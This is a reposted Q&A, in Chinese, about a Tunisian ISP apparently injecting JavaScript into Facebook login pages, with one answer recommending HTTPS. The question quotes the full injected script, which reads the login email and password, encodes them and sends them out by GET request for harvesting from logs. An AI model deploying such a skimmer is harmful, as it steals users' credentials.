gpt4 book ai didi

ISP 的 Javascript 注入(inject)

转载 作者:行者123 更新时间:2023-11-29 22:32:16 24 4
gpt4 key购买 nike

此页面声称突尼斯 ISP 将 javascript 注入(inject) Facebook 页面的源代码中:

http://www.r00ted.com/doku.php?id=injection_tunisie

function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {
var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value;
var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}

根据该页面,用户 wo0dh3ad 不存在,但这将允许在日志中执行简单的 grep 以获取用户的密码(或密码哈希值)。

grep wo0dh3ad /var/log/FAI.log

这真的可行吗?如果是这样,是否有一种方法可以检测对页面的一些篡改,只是说有些东西很奇怪,应该使用另一个浏览器/连接?

最佳答案

使用 SSL (HTTPS) 来防止中间人攻击。

关于ISP 的 Javascript 注入(inject),我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/6532712/

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com